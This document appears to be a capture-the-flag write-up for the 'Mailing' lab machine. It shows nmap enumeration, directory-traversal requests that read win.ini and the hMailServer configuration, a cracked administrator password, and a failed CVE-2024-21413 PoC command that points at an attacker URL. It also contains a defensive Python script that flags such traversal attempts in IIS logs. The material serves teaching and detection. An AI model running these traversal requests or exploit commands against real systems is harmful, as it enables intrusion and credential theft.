Enumeration
Starting with a comprehensive nmap scan (all TCP ports, default scripts, OS and version detection):
sudo nmap -sS -sC -A 10.10.11.14 -T4 -oN first.scan -p-
Key Findings
The scan reveals a Windows server running hMailServer with multiple mail-related services:
- Port 25/587: SMTP (hMailServer)
- Port 80: HTTP (Microsoft IIS 10.0) - redirects to mailing.htb
- Port 110: POP3 (hMailServer)
- Port 143/993: IMAP (hMailServer)
- Port 445: SMB
- Port 465: SSL/SMTP
- Port 5985: WinRM
Domain identified: mailing.htb
Web Enumeration
Local File Inclusion Discovery
When downloading a PDF from the website, the download link passes the file name through a `file` parameter, which suggests a potential LFI vulnerability:
http://mailing.htb/download.php?file=instructions.pdf
Testing LFI
Using Burp Suite to test for directory traversal:
GET /download.php?file=../../../../windows/win.ini HTTP/1.1
Host: mailing.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Response:
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="win.ini"
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
LFI confirmed! We can read any file on the system that the web server's account has permission to read.
Credential Discovery
Extracting hMailServer Configuration
Using the LFI to retrieve the hMailServer configuration file:
GET /download.php?file=../../../../Program%20Files%20(x86)/hMailServer/Bin/hMailServer.ini HTTP/1.1
Host: mailing.htb
Retrieved Configuration:
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
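From the defender's side, the two traversal requests above (win.ini and hMailServer.ini) are exactly what should light up in the IIS access logs. The following is an added example, not part of the original writeup: it parses constructed IIS W3C-format log lines (field layout assumed and trimmed to what is needed), URL-decodes the `file` parameter, and flags requests to download.php that contain traversal sequences or target known sensitive files.

```python
"""Flag directory-traversal (LFI) attempts against download.php in IIS W3C logs."""
import re
from urllib.parse import unquote

# Constructed sample log lines in IIS W3C format (field set trimmed for the example).
SAMPLE_LOG = """#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-05-01 10:00:01 GET /download.php file=instructions.pdf 10.10.14.13 200
2024-05-01 10:00:09 GET /download.php file=../../../../windows/win.ini 10.10.14.13 200
2024-05-01 10:00:15 GET /download.php file=..%2F..%2F..%2F..%2FProgram%20Files%20(x86)%2FhMailServer%2FBin%2FhMailServer.ini 10.10.14.13 200
2024-05-01 10:01:00 GET /index.php - 10.10.14.20 200
"""

# Forward- or back-slash traversal sequences after decoding.
TRAVERSAL = re.compile(r"(\.\./|\.\.\\)")
# Files whose retrieval via a download endpoint is never legitimate.
SENSITIVE = ("win.ini", "hmailserver.ini", "web.config")


def parse_iis_w3c(text):
    """Turn W3C extended log lines into dicts keyed by the #Fields header names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows


def find_lfi_attempts(text, endpoint="/download.php"):
    """Return a hit per request to the endpoint whose query contains traversal."""
    hits = []
    for row in parse_iis_w3c(text):
        if row.get("cs-uri-stem") != endpoint:
            continue
        # Decode twice so double-encoded sequences (%252e%252e) normalise too.
        query = unquote(unquote(row.get("cs-uri-query", "")))
        if TRAVERSAL.search(query):
            target = query.split("=", 1)[-1]
            hits.append({
                "ip": row["c-ip"],
                "target": target,
                "status": row["sc-status"],
                "sensitive": target.lower().endswith(SENSITIVE),
            })
    return hits


if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(f"{hit['ip']} -> {hit['target']} (HTTP {hit['status']}, sensitive={hit['sensitive']})")
```

A 200 status on a flagged request, as in both sample lines, means the traversal succeeded and should be escalated rather than treated as a probe.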
Password Cracking
According to the hMailServer documentation:
- PasswordEncryption=1 means the database password in the [Database] section is Blowfish-encrypted
The administrator password is stored as a hash. After cracking it offline:
Credentials discovered: administrator:homenetworkingadministrator
Exploitation Attempt - CVE-2024-21413
Attempting to exploit the Microsoft Outlook Remote Code Execution vulnerability (CVE-2024-21413) using the discovered credentials.
Exploit Setup
Using the public exploit: CVE-2024-21413 PoC
python3 exploit.py --server "192.168.0.105" \
--port "993" \
--username "[email protected]" \
--password "homenetworkingadministrator" \
--sender "[email protected]" \
--recipient "[email protected]" \
--url "https://10.10.14.13" \
--subject "Hello"
Result:
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Failed to send email: [Errno 111] Connection refused
The connection was refused on every SMTP/IMAP port tried, so additional enumeration is needed to find the correct exploitation path.
Next Steps
- Enumerate valid email users on the system
- Test different mail server ports and protocols
- Investigate alternative exploitation vectors for hMailServer
- Explore other services exposed on the target
Key Takeaways
- LFI vulnerability in download.php allowed reading sensitive configuration files
- hMailServer credentials were stored in an accessible INI file
- The stored administrator password hash was crackable
- Further enumeration needed to progress beyond credential discovery